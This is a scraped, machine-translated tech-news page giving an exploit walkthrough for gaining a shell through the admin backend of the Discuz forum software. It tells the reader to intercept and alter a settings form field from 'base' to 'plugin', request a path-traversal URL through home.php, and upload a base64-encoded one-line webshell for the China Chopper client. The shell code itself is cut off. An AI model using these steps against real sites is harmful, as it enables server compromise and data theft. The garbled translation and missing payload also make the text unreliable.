Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

Example Analysis of the latest background getshell of discuz

2025-04-05 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

This article mainly introduces the example analysis of discuz's latest background getshell, which has a certain reference value. Interested friends can refer to it. I hope you will gain a lot after reading this article. Let's take a look at it.

User-user column-column grouping-submit-grab packet (I made a mistake at this step, be sure to submit, otherwise the packet captured is not the same)

1Content-Disposition: form-data; name= "settingnew [profilegroupnew] [base] [available]"

Change to

1Content-Disposition: form-data; name= "settingnew [profilegroupnew] [plugin] [available]"

Visit

1/home.php?mod=spacecp&id=../../robots.txt57

Local test dzx2.5 grab package to change base to plugin in the following figure

In the test environment, the upload sentence * * failed to connect with the kitchen knife, and finally changed to base64 encryption.

/ / content before encryption

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report